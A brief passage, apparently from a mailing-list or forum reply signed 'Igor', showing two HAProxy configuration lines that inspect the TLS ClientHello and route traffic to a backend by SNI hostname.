tcp-request content accept if { req.ssl_hello_type 1 }
use_backend host.mydomain.com if { req.ssl_sni -i host.mydomain.com }

Thanks,
Igor

